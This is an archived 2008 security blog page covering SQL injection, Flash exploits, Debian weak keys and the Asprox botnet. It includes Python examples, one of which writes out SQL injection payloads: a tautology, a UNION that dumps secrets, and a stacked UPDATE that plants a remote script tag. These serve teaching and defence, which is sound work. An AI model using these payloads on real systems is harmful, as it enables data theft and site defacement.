Security Protection - Harry Waldron (CS)

Security Best Practices, Breaking News, & Updates

May 2008 - Posts

Microsoft Best Practices for preventing SQL Injection Attacks

Microsoft has recently published a series of best practices to help developers build database code that is not susceptible to SQL injection attacks.

SQL injection attacks occur in poorly programmed applications; they are not the result of failures in the database or the supporting products. When an application does not properly validate and control its input, an attacker can craft input that the database executes as part of the SQL statement. In the current mass attacks the injected statements append a redirecting script to the site's stored content, so that the script ends up on every web page served from that data.

Once a web site is infected, the newly embedded script directs visitors to another malicious website that can automatically download malware onto the user's PC. While these attacks have been around for years, malware authors are now using automated tools to find susceptible servers and infect thousands of websites in a single day.

IT developers have an inherent responsibility to protect the privacy and integrity of customer information. These articles are "must reads" for any developer who wants greater assurance of building secure applications.
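To make the point concrete, here is an added example (not code from this post or from the Microsoft articles linked below), in Python against an in-memory SQLite database: the same lookup written by string concatenation and with a bound parameter, fed the same payloads. The tables, column names and the injected script URL are illustrative assumptions. The "batch" form emulates a driver that accepts several statements at once, as SQL Server does under classic ASP; sqlite3.execute refuses statement batches, so executescript stands in for it.

```python
import sqlite3

# Assumed marker for the tag a mass-injection attack appends to stored text.
INJECTED_TAG = '<script src="http://injected.example/x.js"></script>'


def make_db() -> sqlite3.Connection:
    """Constructed sample data: an accounts table and a table of stored page text."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT);
        CREATE TABLE pages (id INTEGER PRIMARY KEY, body TEXT);
        INSERT INTO users (name, secret) VALUES ('alice', 'alice-secret');
        INSERT INTO users (name, secret) VALUES ('bob', 'bob-secret');
        INSERT INTO pages (body) VALUES ('Welcome to the site');
        INSERT INTO pages (body) VALUES ('Contact us');
        """
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    # Deliberately vulnerable: the untrusted value becomes part of the SQL text,
    # so quotes and keywords inside it change the statement's structure.
    sql = "SELECT name, secret FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn: sqlite3.Connection, name: str) -> list:
    # Hardened: the value is bound as a parameter and is never parsed as SQL,
    # so a quote or a keyword in it is just data to compare against.
    sql = "SELECT name, secret FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def search_vulnerable_batch(conn: sqlite3.Connection, term: str) -> None:
    # Emulates a driver that runs statement batches (SQL Server under classic ASP
    # does; sqlite3.execute refuses more than one statement, so executescript
    # stands in). A mass-injection tool ignores the query's result: it appends
    # a second statement that rewrites every stored page.
    sql = "SELECT id FROM pages WHERE body LIKE '%" + term + "%'"
    conn.executescript(sql)


def search_parameterized(conn: sqlite3.Connection, term: str) -> list:
    # The wildcard characters are added to the bound value, not to the SQL text.
    sql = "SELECT id FROM pages WHERE body LIKE ?"
    return conn.execute(sql, ("%" + term + "%",)).fetchall()


def page_bodies(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT body FROM pages ORDER BY id")]


def demo() -> dict:
    """Feed the same payloads to both forms and return what each produced."""
    conn = make_db()
    tautology = "nobody' OR '1'='1"
    union = "nobody' UNION SELECT name, secret FROM users --"
    worm = "x%'; UPDATE pages SET body = body || '" + INJECTED_TAG + "'; --"
    results = {
        "vuln_tautology": lookup_vulnerable(conn, tautology),
        "safe_tautology": lookup_parameterized(conn, tautology),
        "vuln_union": lookup_vulnerable(conn, union),
        "safe_union": lookup_parameterized(conn, union),
    }
    results["safe_search"] = search_parameterized(conn, worm)   # no rows match
    results["pages_after_safe"] = page_bodies(conn)             # untouched
    search_vulnerable_batch(conn, worm)
    results["pages_after_vuln"] = page_bodies(conn)             # every page rewritten
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Run it as a script to print the results. The parameterized queries return nothing for the injected values and leave the pages table untouched; the concatenated ones return every user row and append the script tag to every stored page, which is exactly what the mass attacks described above leave behind.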

Microsoft Best Practices for preventing SQL Injection Attacks

Microsoft Security Vulnerability Research & Defense Blog - SQL Injection Attack
http://blogs.technet.com/swi/archive/2008/05/29/sql-injection-attack.aspx  
 
Nazim's IIS Security Blog - Filtering SQL injection from Classic ASP
http://blogs.iis.net/nazim/archive/2008/04/28/filtering-sql-injection-from-classic-asp.aspx 
 
Neil Carpenter's Blog - SQL Injection Mitigation: Using Parameterized Queries
http://blogs.technet.com/neilcar/archive/2008/05/21/sql-injection-mitigation-using-parameterized-queries.aspx 
http://blogs.technet.com/neilcar/archive/2008/05/23/sql-injection-mitigation-using-parameterized-queries-part-2-types-and-recordsets.aspx 
 
Michael Howard's Blog - Giving SQL Injection the Respect it Deserves
http://blogs.msdn.com/sdl/archive/2008/05/15/giving-sql-injection-the-respect-it-deserves.aspx 
 
MSDN Article - Preventing SQL Injections in ASP
http://msdn.microsoft.com/en-us/library/cc676512.aspx 
 
Anti-Malware Engineering Team - When SQL Injections Go Awry, Incident Case Study
http://blogs.technet.com/antimalware/archive/2008/05/30/when-sql-injections-go-awry-incident-case-study.aspx 
 
A more general overview of SQL injection attacks can also be found here:
 
What are SQL Injection Attacks?
http://en.wikipedia.org/wiki/Sql_injection

Adobe Flash - How to disable and enable in IE 7 or IE 8

Earlier this spring, a hacking contest took place in which a Vista laptop was compromised through a Flash vulnerability rather than through a weakness in Vista's own security controls. As I don't have Flash installed in any of the alternative browsers I use (e.g., Firefox, Opera), I've been getting along fine without it in those environments. I then reviewed the IE security options and found a simple way to disable or re-enable Flash as desired. This approach does not work with IE 6 or earlier versions.

Currently, a new massive attack is under way in which malicious SWF objects have been seeded on thousands of web sites (one estimate put the count at 250,000 infected web pages). Most of the current attacks are stopped by moving to the latest version of Flash (9.0.124). However, AVERT and other AV vendors are still investigating whether new exploits are being crafted that could infect fully up-to-date systems.

The instructions below show how to temporarily disable Flash until it is certain that all the exploits in circulation have been patched. Because the setting also suppresses Flash-based advertising, I usually leave Flash disabled and turn it on occasionally when it's truly needed.

IE Settings - Disable/enable add-ons (e.g., Flash)

Tools >>> Internet Options >>> Programs tab >>> Manage add-ons button >>> Show: Add-ons that run without requiring permission >>> select Shockwave Flash Object >>> click the Disable button at the bottom

To re-enable Flash, follow the same steps and select Enable in the last step. If desired, you can also stop the Adobe PDF Reader and Windows Media Player add-ons from starting within IE; both programs still work normally when started outside of IE. Since these settings work the same way as the Flash steps above, they can also be toggled back on when needed.

CAUTIONARY NOTES ON THE SETTINGS ABOVE:

1. Avoid making these changes unless you are familiar with IE settings and understand the technical steps noted above.

2. Avoid disabling other add-ons, as doing so could affect or break browser functions.

3. Flash may be used heavily by a webmail site or a forum you post to frequently, in which case the warning message could appear often.

4. The steps were written against IE 8 and should also work in IE 7.

Bank of New York Mellon loses tapes with data on 4.5M clients

Hopefully, the tapes were misplaced rather than stolen for the purposes of identity theft or fraud.

Bank of New York Mellon loses tapes with data on 4.5M clients
http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9091318&source=NLT_PM&nlid=8

QUOTE: May 30, 2008 (Computerworld) Bank of New York Mellon Corp. officials last week confirmed that a box of unencrypted data storage tapes holding personal information of more than 4.5 million individuals was lost more than three months ago by a third-party vendor during transport to an off-site facility.

The bank informed the Connecticut State Attorney General's Office that the tapes belonging to its BNY Mellon Shareowner Services division were lost in transport by off-site storage firm Archive America on Feb. 27. The missing backup tapes include names, birth dates, Social Security numbers, and other information from customers of BNY Mellon and the People's United Bank in Bridgeport, Conn., according to a statement by Connecticut Attorney General Richard Blumenthal.

Adobe Flash Player Flaw - Massive Exploitation reported

Security sites are warning of increased dangers of malformed Shockwave Flash (SWF) objects. I've read reports of possibly 250,000 web pages hosting this new exploit.    It is important to move to the latest version of Flash if prompted or manually update if you are not on version 9.0.124.

Adobe test site which will show latest version (should be 9.0.124)
http://kb.adobe.com/selfservice/viewContent.do?externalId=tn_15507

How to manually update if needed (be sure to uncheck Google Toolbar)
http://www.adobe.com/products/flashplayer/ 

AVERT reports that recent sites affected by mass hacking attacks are being redirected to load malicious SWF files. These exploits are being programmed for specific versions of Flash to broaden the scope of attacks.  Finally, please see last AVERT link (05/28), as they are researching a new variant that might possibly exploit Flash where it is fully up-to-date (e.g., 9.0.124).

Adobe Flash Player Flaw - Massive Exploitation reported
http://www.frsirt.com/english/

QUOTE: Adobe Flash Player Flaw Massive Exploitation -- The Adobe Flash Player vulnerability which was disclosed this week by Symantec and believed to be unknown (zero-day) is a previously known issue that was patched with version 9.0.124.0. Multiple compromised web pages are currently exploiting this flaw and distributing malware.

ADDITIONAL LINKS
http://www.frsirt.com/english/advisories/2008/1158
http://isc.sans.org/diary.html?storyid=4474 
http://secunia.com/advisories/30404/
http://www.securityfocus.com/bid/29386
http://www.avertlabs.com/research/blog/index.php/2008/05/27/flash-player-exploit-update/

QUOTE: Here’s a quick update to the earlier post on a new unpatched Adobe Flash vulnerability. Through looking for sites serving these SWF exploits we’ve found a connection with recent mass hacks. Hacked sites reference an external script, just as they have for quite some time. But, the external scripts now reference an SWF file.

New variants emerging - AVERT researching claims that currently patched systems may be vulnerable?
http://www.avertlabs.com/research/blog/index.php/2008/05/28/flash-player-exploit-update-2/ 

QUOTE: At first, this appeared to close the case, but there was a report of a patched version of Flash falling victim to one of these attacks, and we’ve seen an SWF file referencing a missing file named WIN 9,0,124,0i.swf, which also suggests that the latest version of Flash is the target of that file.

Kim Komando - Practical Advice when selecting your next PC

I listen often to Kim Komando's talk show and found today's Tip of the Day newsletter offered a lot of practical advice on buying a new PC, as well as an easy-to-understand overview of the latest microprocessor developments.

http://www.komando.com/

http://www.komando.com/tips/categories.aspx?cat=43

Picking a microprocessor

Q: It's time to move up from my old Intel Pentium 4, 3GHz system. Where can I learn about what's out there? Dual Core? Dual Quad? I need a simple explanation about these processors.

A: A lot has happened since your microprocessor was introduced. The 3GHz Pentium 4 goes back about five years. That qualifies as an eon in computers.

For most people, that old Pentium 4 would still be adequate. Today's cutting edge chips are running far in front of consumer software. So, unless you're editing lots of video or playing the most demanding games, you don't need to worry about the chip. Today's chips are more advanced than your Pentium. As you point out, they have multiple cores. They are also 64-bit chips, while yours is 32-bit. The architecture of these things is just brilliant. But most of it is going unused.

Let's start with the cores, since you mentioned them. Each core is its own little processor. Both Intel and AMD are producing multi-core chips. The most advanced Intel chips have four cores.  AMD had the chip lead at one time. But it struggled with its quad core chips. It did finally get them out, well after Intel.  Quad-core chips work well on servers. But they are overkill in the consumer space. A quad core gives you one thing—bragging rights.

Windows is capable of running on multiple cores. So it can take advantage of these advances. But few consumer programs use more than one core. In fact, porting consumer programs to multiple cores is a huge concern.  The same type of thing applies to 64-bit chips. This number refers to the amount of data a core can crunch at once. AMD and Intel chips now are 64-bit. That's pretty meaningless, though. Practically everything else is 32-bit.

True, you can get a 64-bit version of Windows Vista. But I don't recommend that. You would probably discover that drivers are hard to find. That would mean that certain peripherals couldn't be used.  You could probably get by with Intel's Celeron, or AMD's Sempron. Both are budget microprocessors. But you can't be sure of what the future will bring. So I would go with an Intel Core 2 Duo or AMD Athlon X2. If future programs use dual-core technology, you'll be ready. You might see high-end computers with Intel Extreme or AMD Phenom chips. Those are very powerful. They should work well in gaming and video-editing situations. Otherwise, you can't use the power.

I assume you'll be buying Windows Vista. You will see one of four versions. I have a chart that explains them. There is a fifth version—Enterprise. You won't see that in stores.  Vista is more capable than its predecessor, XP. Consequently, its video requirements are pretty stiff. Get a minimum of 128 megabytes of video RAM. Go for 256MB, if you have room in your budget.  I prefer a separate video card. But integrated graphics will also work. I have a tip that explains this further.  Don't overload your system with random access memory. I recommend 2 gigabytes. If you need more, go up to 3GB. Over that, and you're probably just throwing your money away.

Windows Vista UAC Controls - Tame it without turning it off

User Account Control (UAC) in Vista may at times do too good a job, as it is designed to provide safety warnings. It prompts for consent (or for an administrator password, when the logged-on user is not an administrator) whenever a task, icon or script marked with the shield icon is invoked. This Information Week article is excellent and shares some techniques to tailor UAC so that it still warns properly, but less often on common day-to-day tasks.

Information Week: How To Tame Microsoft Windows Vista's UAC
http://www.informationweek.com/news/windows/operatingsystems/showArticle.jhtml?articleID=207801611

QUOTE: Are all those Windows Vista User Account Control warnings driving you nuts? Here are seven ways to make Vista's UAC less intrusive, while keeping legitimate security threats at bay. It's tempting to just turn off UAC and be done with it, but I'm not convinced this is a worthwhile solution. There are times when you'll want the protection that UAC affords, and there are ways you can make UAC a lot friendlier and less intrusive. Work with it rather than against it, and you may be pleasantly surprised at how manageable it really is.

BRIEF SUMMARY OF SEVEN UAC RECOMMENDATIONS

1. Slow An Overzealous UAC (tailor the circumstances UAC dialogs should and should not show up)

2. Use Process Explorer (an optional tool from Sysinternals)
http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx

3. Schedule A Task To Run As Admin (set up common pre-existing applications to bypass UAC)
http://www.informationweek.com/news/windows/operatingsystems/showArticle.jhtml?articleID=207801611&pgno=3

4. Use UAC's "Quiet Mode" (requires an advanced registry setting so that common pre-existing applications bypass the UAC prompt)

5. Turn Off The Secure Desktop (the screen darkening and return to normal after accepting a prompt can take a few seconds; turning this off on older equipment may make UAC more acceptable, at the cost of the isolation that keeps other programs from interacting with the prompt)

6. Tighten Up UAC's Control (It may also be desirable for Admins to supply passwords for UAC prompts)

7. Enforce Running Signed Code (Another strengthening measure is to ensure only signed code is run which can safeguard against malware; but as a caution there are many legitimate programs that execute unsigned code)

Storm Worm - New Version uses SQL Injection Techniques

While the Storm worm botnet continues to spread via email, SQL injection is now also being used to seed malware from compromised web sites onto vulnerable computers. Folks should be careful with email, avoiding all unexpected attachments and website links, and stay up to date on security patches and AV protection.

Storm Worm - New Version uses SQL Injection Techniques
http://blogs.zdnet.com/security/?p=1131
http://ddanchev.blogspot.com/2008/05/all-you-need-is-storm-worms-love.html

QUOTE: What has changed compared to previous campaigns? Storm Worm is back in the SQL injection attack phase, with a malicious iframe injected at a small number of sites for the time being. Moreover, assessing the storm worm infected hosts can only be done if you spoof your browser UI, otherwise you will get no indication for any kind of malicious activity going on. Furthermore, despite that there are no exploits used at the infected hosts but, a heavily obfuscated HTML was detected in their injected domain which would load automatically upon someone visiting an already injected site.

Identity Theft Monitoring Services in USA - What You Need To Know

This Information Week article provides an excellent overview of identity theft monitoring services. As more than 225 million records have been breached since 2005, the article describes what these firms can and cannot do for their customers. A list of low-cost and free methods of protection is also provided:

ID Theft Monitoring Services: What You Need To Know
http://www.informationweek.com/news/security/privacy/showArticle.jhtml?articleID=207501091

QUOTE: Take identity theft monitoring service providers. The pitch? Give us your Social Security number and notification of suspicious identity activity is only an e-mail alert or phone call away. These services, which typically cost $10 to $20 per month, offer to guard your identity by monitoring the three credit-reporting agencies (Experian, Equifax, and TransUnion), cell phone applications, government databases, and public information. Some also provide insurance (subject to underwriting, and not valid in every state) to help defray costs associated with recovering from identity theft cases.

Monitoring helps with identity theft by actively watching for fraud in your name. "The credit monitoring service notifies you at an earlier stage than you might otherwise know about the fraud, because otherwise it could be months before someone potentially finds out about it," says Paul Stephens, director of policy and advocacy at PRC.

Monitoring, however, won't stop identity theft outright. "With credit monitoring, your report is still potentially seen by people who want to commit fraudulent acts against you," he says. "You'll get an early warning, but you haven't actually prevented them from using the report." At this point, it's also too late to freeze your credit, which prohibits anyone but current creditors from seeing a credit report. This means your personal data is already at large, and may have been used to gain a credit card, cell phone, or even mortgage in your name.

Below are some low-cost and free ways to better protect your identity:

Five Mostly Free Alternatives to ID Theft Monitoring Services
http://www.informationweek.com/news/security/privacy/showArticle.jhtml?articleID=207501091&pgno=4

SUMMARY OF FREE OR LOW-COST RECOMMENDATIONS

1. Watch your credit reports. Everyone is entitled to see a free credit report annually from each of the three credit-reporting agencies (Experian, Equifax, and TransUnion). To obtain yours, see:

http://www.annualcreditreport.com 

2. Use credit freezes. A credit freeze (aka "security freeze") locks credit reports so only you or current creditors can see them. It can also be unlocked on a per-creditor basis, for example if you're going to buy a house or car, or get a new credit card. The cost is $10 per bureau to place a freeze and $10 to lift a freeze.

3. Place fraud alerts. Under the Fair Credit Reporting Act, consumers may place a fraud alert on their credit report for 90 days, renewable indefinitely.

4. Avoid debit cards. Attacks which steal card numbers via ID-swiping devices -- often installed at gas stations and grocery stores -- are on the rise.

5. Look to resolution services. Public agencies and non-profit organizations can help you clean up identity theft for free.

Gas Spam Emerges - Can you really save 70 cents per gallon?

Daily, I'm receiving numerous copies of "gas spam". These messages typically claim a savings of 70 cents per gallon if you subscribe to a special product or solution.

Folks must avoid clicking any links in spam messages, to avoid any potential for spyware or viruses. This includes the "opt out" or "unsubscribe" links: spammers rarely honor opt-out requests, and clicking one confirms to them that the address is live and being read.

The best practice is to select all these messages in the inbox and delete them without opening them. There are no free lunches on the Internet. Always avoid email messages making claims that seem too good to be true.

Gas Spam Emerges - Can you really save 70 cents per gallon?
http://www.avertlabs.com/research/blog/index.php/2008/05/09/gas-spam/

QUOTE: In my role as an anti-spam researcher I get to see a lot of spam. Most of the spam I see can be categorized into a fairly small range of spam types. Common examples include pharmacy, stock and watch spam.  Over the last few weeks I have seen a new type of spam. This is spam which is trying to sell a product to save money on gas.

Linux OpenSSL Issues - Update your Debian generated keys/certs ASAP

As recommended, any SSH keys, SSL certificates and other key material generated with the affected Debian OpenSSL packages should be regenerated after applying the updated release; the update fixes the generator but does not replace weak keys that are already in use. The links below explain the key issues:

INFOCon yellow: update your Debian generated keys/certs ASAP
http://isc.sans.org/diary.html?storyid=4421

QUOTE: Scripts that allow brute forcing of vulnerable keys (see this as rainbow tables for SSH keys) are in the wild so we would like to remind all of you to regenerate SSH keys ASAP. Please keep in mind that SSL certificates should be regenerated as well. This can be even more problematic if you had your certificates signed since you'll have to go through this process again (and possibly pay money again).

Update 2310 UTC: The new Debian package for SSH (ssh_4.3p2-9etch1) also applies a package called "openssh-blacklist". After this update, your SSH server will refuse keys from the compromised set. The package also installs a new tool called "ssh-vulnkey" that can help in hunting down key files that contain weak keys. Note that in combination with the existing ssh-keyscan, ssh-vulnkey can be used to easily identify servers that use weak host keys, so while these Debian patches help those who patch, they also make attacks easier against those who did not yet patch.

Additional Links
http://www.pcmag.com/article2/0,2817,2305554,00.asp
http://www.avertlabs.com/research/blog/index.php/2008/05/16/code-cleanup-gone-wrong/

H.D. Moore's Analysis
http://metasploit.com/users/hdm/tools/debian-openssl/

QUOTE: But the bug introduced by Debian effectively reduces the strength of the key to 32768 permutations, which is 16 bits. Famed security researcher HD Moore has actually already pre-calculated all of the potential keys for the most common cases. It took mere hours. So now you can be hacked even without someone brute-forcing your encryption.
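Because the Debian change left the process ID as the only entropy, there are only 32768 (2^15) possible keys for a given key type, size and architecture, which is why precomputing all of them takes hours rather than years. The following is an added example (not the Debian ssh-vulnkey tool or the openssh-blacklist package) in Python showing the mechanism behind such a check: it parses OpenSSH public-key lines from authorized_keys or known_hosts, computes the MD5 fingerprint that ssh-keygen -l printed at the time, and flags any key whose fingerprint appears in a blacklist. The real blacklists are not reproduced: the blacklist here is a constructed set, the key blobs are built inline from made-up integers (not real RSA keys), and the blacklist file format is an assumption.

```python
import base64
import hashlib
import struct


def _ssh_string(data: bytes) -> bytes:
    """OpenSSH wire 'string': 4-byte big-endian length followed by the bytes."""
    return struct.pack(">I", len(data)) + data


def _mpint(n: int) -> bytes:
    """OpenSSH wire 'mpint': minimal big-endian two's complement, with a leading
    zero byte when the top bit is set so the value is not read as negative."""
    if n == 0:
        return _ssh_string(b"")
    raw = n.to_bytes((n.bit_length() + 7) // 8, "big")
    if raw[0] & 0x80:
        raw = b"\x00" + raw
    return _ssh_string(raw)


def rsa_public_line(e: int, n: int, comment: str) -> str:
    """Build an authorized_keys style line from (e, n). The integers passed in
    below are made up for the demonstration; they are not a real RSA key pair."""
    blob = _ssh_string(b"ssh-rsa") + _mpint(e) + _mpint(n)
    return "ssh-rsa " + base64.b64encode(blob).decode("ascii") + " " + comment


def _key_fields(line: str):
    """Return (type, base64 blob, comment). known_hosts lines put the host name
    first and authorized_keys lines may carry options, so scan for the type."""
    fields = line.split()
    for i, field in enumerate(fields):
        if field.startswith("ssh-") and i + 1 < len(fields):
            return field, fields[i + 1], " ".join(fields[i + 2:])
    raise ValueError("not an OpenSSH public key line")


def fingerprint_md5(line: str) -> str:
    """MD5 of the decoded key blob as 32 hex digits: what ssh-keygen -l showed
    at the time, and what blacklist entries are derived from."""
    _ktype, b64, _comment = _key_fields(line)
    return hashlib.md5(base64.b64decode(b64)).hexdigest()


def colon_form(fp: str) -> str:
    """Render a hex fingerprint in ssh-keygen's aa:bb:cc form."""
    return ":".join(fp[i:i + 2] for i in range(0, len(fp), 2))


def load_blacklist(text: str) -> set:
    """Assumed format: one 32-hex-digit MD5 fingerprint per line, '#' comments."""
    return {ln.strip().lower() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")}


def scan_keys(lines, blacklist: set) -> list:
    """Return (identifier, fingerprint) for each key whose fingerprint is
    blacklisted; the identifier is the comment, or the host for known_hosts."""
    hits = []
    for ln in lines:
        ln = ln.strip()
        if not ln or ln.startswith("#"):
            continue
        _ktype, _b64, comment = _key_fields(ln)
        fp = fingerprint_md5(ln)
        if fp in blacklist:
            hits.append((comment or ln.split()[0], fp))
    return hits


# Constructed inputs: two keys, one of which we pretend came from the bad generator.
WEAK_KEY = rsa_public_line(65537, 0xC0DEBADC0FFEE1D0DEB1A4, "weak@etch-host")
GOOD_KEY = rsa_public_line(65537, 0xF00DFACE5EEDBEEF1234567, "ok@patched-host")
SAMPLE_KEYS = [
    "# authorized_keys entries (constructed)",
    WEAK_KEY,
    GOOD_KEY,
    # known_hosts entry: host name first, no comment (constructed)
    "server.example " + WEAK_KEY.rsplit(" ", 1)[0],
]
BLACKLIST_TEXT = (
    "# constructed blacklist; the real openssh-blacklist data is not reproduced\n"
    + fingerprint_md5(WEAK_KEY) + "\n"
)


if __name__ == "__main__":
    for ident, fp in scan_keys(SAMPLE_KEYS, load_blacklist(BLACKLIST_TEXT)):
        print("blacklisted key:", ident, colon_form(fp))
```

Feed it the contents of authorized_keys and known_hosts files, or the output of ssh-keyscan, together with a blacklist in the assumed format. A hit means the key pair must be replaced everywhere it is installed, not merely removed from the one file where it was noticed; and, as the SANS note above warns, the same scan run by an attacker against unpatched servers tells them which host keys to target.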

Asprox Botnet Installs SQL Injection Tool

A small botnet known as Asprox has been used for password stealing, spam and phishing attacks. This week Asprox was modified to include a new SQL injection tool. As noted previously, SQL injection attacks reflect poorly programmed web applications rather than vendor product vulnerabilities.

This new botnet-based attack is innovative. It uses Google's search engine to locate potentially vulnerable web pages. When a weakness is found, Asprox injects a redirecting iframe into the vulnerable website. Later, visitors to the newly seeded page may have malicious code downloaded and installed on their PC automatically, joining it to the Asprox botnet.

It's always important to stay up to date on security patches and AV protection, as this can help prevent an infection if folks accidentally visit a malicious website.

Asprox Botnet Installs SQL Injection Tool
http://www.secureworks.com/research/threats/danmecasprox/
http://vil.mcafeesecurity.com/vil/content/v_137684.htm
http://www.eweek.com/c/a/Security/Botnet-Installs-SQL-Injection-Tool/
http://www.scmagazineus.com/Asprox-botnet-malware-morphs/article/110169/
http://news.idg.no/cw/art.cfm?id=E9210D49-17A4-0F78-31AA26FE725B1F22

QUOTE: Danmec is a password-stealing trojan which has been around for a couple of years, but in the last year new components have been introduced by the author, turning it into a more complete crimeware family. One of these components (developed last year) is the Asprox trojan, which is designed to create a spam botnet which appears to be solely dedicated to sending phishing emails. As of yesterday, we observed the Asprox botnet pushing an update to the infected systems, a binary with the filename msscntr32.exe. The executable is installed as a system service with the name "Microsoft Security Center Extension", but in reality it is a SQL-injection attack tool.

After the Asprox botnet seeds its bots with the msscntr32.exe file, the attack tool launches and uses Google's search engine to find potentially-vulnerable pages. It then hits those pages with a SQL-injection attack and, if successful, plants a malicious IFRAME on the site.

Visitors are redirected through a series of malware-hosting servers that try one or more exploits to crack the PC. If that works, a Trojan horse is downloaded and installed on the PC, adding it to the Asprox botnet; those compromised PCs are then used to spew more phishing spam.

Stewart has counted 1,000 sites that have been hacked by the SQL-injection attack tool since Monday night. The sites include small business sites, domains for several small colleges and universities and some hosted by law firms. Most are in the U.S.
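If one of your sites turns up in such a sweep, the first incident-response question is how much stored content was altered. The following is an added example (not code from this post or from the SecureWorks, McAfee or eWeek reports above) of that check in Python: it walks every text column in a database, reports rows that carry an injected iframe or external script tag, and can strip them. It runs against an in-memory SQLite database with constructed rows; the table names and the malicious hostname are assumptions, and cleaning the rows without fixing the injectable page only invites reinfection.

```python
import re
import sqlite3

# Matches an <iframe ...> or <script ... src=...> tag whose src points at an
# external URL, with or without quotes, plus its closing tag if present.
INJECTED_TAG = re.compile(
    r"<(iframe|script)\b[^>]*?\bsrc\s*=\s*[\"']?(https?://[^\"'\s>]+)[^>]*>\s*(?:</\1\s*>)?",
    re.IGNORECASE,
)


def _ident(name: str) -> str:
    """Quote a schema identifier (these come from the catalog, not from users)."""
    return '"' + name.replace('"', '""') + '"'


def make_db() -> sqlite3.Connection:
    """Constructed sample: two tables, three cells carrying injected tags, the rest clean."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE products (id INTEGER PRIMARY KEY, name VARCHAR(100), price REAL);
        """
    )
    iframe = "<iframe src=http://malicious.example/in.php width=0 height=0></iframe>"
    script = '<script src="http://malicious.example/b.js"></script>'
    conn.executemany(
        "INSERT INTO news (title, body) VALUES (?, ?)",
        [
            ("Campus news", "Term starts Monday." + iframe),
            ("Library hours", "Open 9 to 5."),
            ("Alumni" + script, "Reunion in June."),
        ],
    )
    conn.executemany(
        "INSERT INTO products (name, price) VALUES (?, ?)",
        [("Widget", 9.99), ("Gadget" + script, 19.99)],
    )
    conn.commit()
    return conn


def text_columns(conn: sqlite3.Connection) -> list:
    """Every (table, column) whose declared type is textual, in catalog order."""
    cols = []
    tables = conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' "
        "AND name NOT LIKE 'sqlite_%' ORDER BY rowid"
    ).fetchall()
    for (table,) in tables:
        for _cid, column, ctype, *_rest in conn.execute("PRAGMA table_info(" + _ident(table) + ")"):
            if any(k in ctype.upper() for k in ("CHAR", "TEXT", "CLOB")):
                cols.append((table, column))
    return cols


def find_injected(conn: sqlite3.Connection) -> list:
    """Report every text cell containing an injected tag (tables must have a rowid)."""
    findings = []
    for table, column in text_columns(conn):
        sql = "SELECT rowid, {c} FROM {t} WHERE {c} LIKE '%<%' ORDER BY rowid".format(
            c=_ident(column), t=_ident(table)
        )
        for rowid, value in conn.execute(sql):
            for _tag, url in INJECTED_TAG.findall(value or ""):
                findings.append({"table": table, "column": column, "rowid": rowid, "url": url})
    return findings


def clean_injected(conn: sqlite3.Connection) -> int:
    """Strip the injected tags in place; returns the number of cells rewritten.
    This removes the payload only: the injectable page still has to be fixed."""
    rewritten = 0
    for table, column in text_columns(conn):
        sql = "SELECT rowid, {c} FROM {t} WHERE {c} LIKE '%<%'".format(
            c=_ident(column), t=_ident(table)
        )
        for rowid, value in conn.execute(sql).fetchall():
            cleaned = INJECTED_TAG.sub("", value or "")
            if cleaned != value:
                conn.execute(
                    "UPDATE {t} SET {c} = ? WHERE rowid = ?".format(t=_ident(table), c=_ident(column)),
                    (cleaned, rowid),
                )
                rewritten += 1
    conn.commit()
    return rewritten


if __name__ == "__main__":
    db = make_db()
    for f in find_injected(db):
        print("{table}.{column} rowid {rowid}: loads {url}".format(**f))
    print("cells cleaned:", clean_injected(db))
```

Point it at a copy of the production database first and keep the findings: the set of distinct URLs tells you which external hosts to block at the proxy, and the affected tables and columns show which page (and which query) the injection came through.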

Windows XP SP3 - Jesper's Workaround for Endless Reboot issue

While HP works on a solution for the IntelPPM (Intel power-management) driver that is left enabled on certain AMD-based models, this neat script checks for the affected configuration and disables the driver so that Windows XP SP3 can boot successfully.

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9085978

https://msinfluentials.com/blogs/jesper/archive/2008/05/08/does-your-amd-based-computer-boot-after-installing-xp-sp3.aspx

QUOTE: May 15, 2008 (Computerworld) A former Microsoft Corp. security manager has published a tool designed to detect and fix PCs that may be susceptible to "endless reboots" if updated to Windows XP Service Pack 3 (SP3).

Jesper Johansson, once a program manager for security policy at Microsoft and currently an MVP (Microsoft Most Valuable Professional) who works at Amazon.com, posted a link to the tool on his blog yesterday, beating his former employer and Hewlett-Packard Co. to the draw. Neither company has yet come up with a fix or patch for the weeklong snafu.

Johansson's small, 16K VBScript (Visual Basic Scripting Edition) file checks whether the PC is running a processor from Advanced Micro Devices Inc. (AMD), and if so, examines the Windows registry to see if a device driver meant for Intel-based machines is set to load.

"If it is, it will offer you an option to disable it," said Johansson in an update to a blog post where he has been summarizing reports of Windows XP SP3 problems and offering solutions. Users can run the script from the command line to check multiple machines on a network, Johansson added.

Project Closure -- Ten Things that should be done

This is EXCELLENT advice, as project closure is often neglected because of the need to start the next project right away.

Article: 10 things you should do near the end of a project
http://blogs.techrepublic.com.com/10things/?p=351

QUOTE: In either case, you probably go through the typical inception, elaboration, and construction phases of a project. But when it comes to the end of a project, many project managers come up just short of the finish line. Failure to handle the final steps can add confusion to an initiative and may lead to customer dissatisfaction, unhappy staff, and a project dragging on longer than necessary.

#1: Finalize testing
#2: Finalize training
#3: Validate deliverables
#4: Get project signoff
#5: Release the team
#6: Analyze actual vs. planned
#7: Archive documentation
#8: Ensure contract closure
#9: Conduct a postmortem meeting
#10: Perform a self assessment

PC Magazine - Updated list of Free Security Software

As noted in the article, there are both advantages and disadvantages to using free security software instead of a purchased security suite. Personally, I like using some of the freely available tools, as they are efficient and as protective as competing products that require purchase.

Still, folks should do their homework and ensure any free product will meet their needs. They should research free product offerings to understand what these tools will and will not do.

